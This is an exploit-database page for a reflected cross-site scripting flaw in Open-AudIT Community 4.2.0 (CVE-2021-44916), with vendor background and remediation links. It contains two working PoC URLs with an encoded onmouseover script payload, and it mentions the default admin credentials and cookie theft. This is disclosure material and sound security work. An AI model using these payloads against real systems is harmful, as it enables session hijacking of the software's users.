Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDominic ClarkPACKETSTORM:165502
HistoryJan 10, 2022 - 12:00 a.m.

Open-AudIT Community 4.2.0 Cross Site Scripting

2022-01-1000:00:00
Dominic Clark
packetstormsecurity.com
231
open-audit
cross site scripting
vulnerability
webapps
authenticated
windows 10
cve-2021-44916
opmantek
gui
javascript
exploit
remediation

EPSS

0.017

Percentile

88.1%

JSON
`# Exploit Title: Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)  
# Date: 01/11/2021  
# Exploit Author: Dominic Clark (parzival)  
# Vendor Homepage: https://opmantek.com/  
# Software Link: https://www.open-audit.org/downloads.php  
# Category: WebApps  
# Version: <= 4.2.0  
# Tested on: Windows 10  
# CVE: CVE-2021-44916  
  
# 1. Vendor Description  
# Open-AudIT is an application to tell you exactly what is on your network, how it is configured and when it changes.  
# Essentially, Open-AudIT is a database of information, that can be queried via a web interface.  
# Open-AudIT will run on both Windows and Linux systems.   
  
# 2. Technical Description  
# There is an issue with link creation in the GUI with Open-AudIT Community.  
# If a bad value is passed to the routine via a URL, javascript code can be executed.  
# This requires the user be logged in to Open-AudIT Community to trigger.  
  
# 3. Proof of Concept  
# Step 1: Login to Open-AudIT via the login page (default credentials are admin/password)  
# Step 2: Enter one of the following PoC URLs, this issue was observed to occur any time there is a file available to be imported: (e.g., http://localhost/open-audit/index.php/attributes/import)  
  
Vulnerable URL 1: "http://localhost/open-audit/index.php/discoveries/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22"  
Vulnerable URL 2: "http://localhost/open-audit/index.php/credentials/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22"  
  
# Step 3: Observe that the payload successfully executes and a popup is displayed.   
# This vulnerability can be exploited in conjuction with a social engineering attack to potentially obtain sensitive information such a users session cookie.  
  
# 4. Remediation  
# Apply the recommended workarounds and mitigations provided by Opmantek.  
# https://community.opmantek.com/display/OA/Errata+-+4.2.0+and+earlier+Javascript+vulnerability  
  
`

Related

cvelist 1
prion 1
cve 1
exploitdb 1
nvd 1
osv 1
zdt 1
cvelist
cvelist
CVE-2021-44916
2021-12-20 11:31:48
prion
prion
Cross site scripting
2021-12-20 12:15:00
cve
cve
CVE-2021-44916
2021-12-20 12:15:07
exploitdb
exploitdb
Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)
2022-01-10 00:00:00
nvd
nvd
CVE-2021-44916
2021-12-20 12:15:07
osv
osv
CVE-2021-44916
2021-12-20 12:15:07
zdt
zdt
Open-AudIT Community 4.2.0 - Cross-Site Scripting Vulnerability
2022-01-10 00:00:00

EPSS

0.017

Percentile

88.1%

JSON
Related for PACKETSTORM:165502
cvelist1prion1cve1exploitdb1nvd1osv1zdt1